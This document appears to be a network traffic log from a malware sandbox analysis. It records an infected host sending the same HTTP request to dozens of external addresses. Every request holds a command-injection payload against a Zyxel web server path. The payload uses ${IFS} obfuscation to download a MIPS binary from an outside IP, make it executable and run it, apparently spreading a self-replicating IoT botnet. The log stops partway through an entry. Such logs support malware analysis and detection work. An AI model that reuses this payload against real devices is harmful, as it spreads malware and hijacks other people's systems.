                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248614073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8184192.168.2.144802473.100.78.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248639107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8185192.168.2.1453208183.113.150.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248672009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8186192.168.2.144128646.86.22.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248725891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8187192.168.2.1445622206.12.10.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248754978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8188192.168.2.144690813.190.45.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248806000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8189192.168.2.1444866134.247.154.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248848915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8190192.168.2.145413432.5.190.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248908997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8191192.168.2.145972445.45.152.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248961926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8192192.168.2.144260696.125.194.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249001026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8193192.168.2.1456214219.154.138.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249033928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8194192.168.2.1451906159.247.123.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249087095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8195192.168.2.1446282143.228.117.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249134064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8196192.168.2.144998250.169.11.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249180079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8197192.168.2.1439118183.138.26.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249262094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8198192.168.2.144989232.172.129.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249289036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8199192.168.2.1448390106.131.142.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249324083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8200192.168.2.1459548174.33.115.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249324083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8201192.168.2.1453456153.136.181.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249351978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8202192.168.2.1432966103.48.159.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249377012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8203192.168.2.1444060157.73.95.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249438047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8204192.168.2.1455714108.147.173.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249465942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8205192.168.2.14471008.41.174.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249509096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8206192.168.2.145463840.196.79.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249562025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8207192.168.2.1447238189.199.77.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249617100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8208192.168.2.1448400207.38.229.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249661922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8209192.168.2.1457102211.67.8.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249701023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8210192.168.2.144223063.198.32.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249728918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8211192.168.2.1445790157.154.120.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249747992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8212192.168.2.1450296170.129.111.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249809027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8213192.168.2.146008889.238.200.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249840021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8214192.168.2.1435100164.46.51.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249861956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8215192.168.2.1435972196.80.147.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249905109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8216192.168.2.144837851.242.68.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249939919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8217192.168.2.14498381.253.31.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.249955893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8218192.168.2.1441898143.2.204.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250026941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8219192.168.2.143553874.179.164.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250053883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8220192.168.2.1437910106.74.16.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250083923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8221192.168.2.144030638.61.228.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250138998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8222192.168.2.144553285.210.71.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250179052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8223192.168.2.144747651.235.83.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250231981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8224192.168.2.144176499.65.203.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250284910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8225192.168.2.1453728186.204.173.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250334024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8226192.168.2.1460042193.28.217.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250376940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8227192.168.2.143300884.207.252.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250396967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8228192.168.2.1458066193.177.166.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250458002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8229192.168.2.1433852191.48.98.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250487089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8230192.168.2.1433344106.158.191.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250514984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8231192.168.2.145610488.51.70.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250552893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8232192.168.2.143631057.39.220.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250590086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8233192.168.2.143317687.233.114.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250708103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8234192.168.2.1445076212.29.34.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250749111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8235192.168.2.1457220106.253.23.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250790119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8236192.168.2.1449166144.171.98.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250829935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8237192.168.2.14608404.113.25.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250861883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8238192.168.2.1452772129.244.108.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250920057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8239192.168.2.1455438113.110.69.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.250953913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8240192.168.2.145132019.156.78.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251003981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8241192.168.2.1459942206.70.253.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251039982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8242192.168.2.144557440.243.163.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251090050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8243192.168.2.145211236.24.41.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251127005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8244192.168.2.1446988202.177.116.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251157045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8245192.168.2.144693268.152.218.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251199961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8246192.168.2.144070014.22.170.10443
                                                        TimestampBytes transferredDirectionData
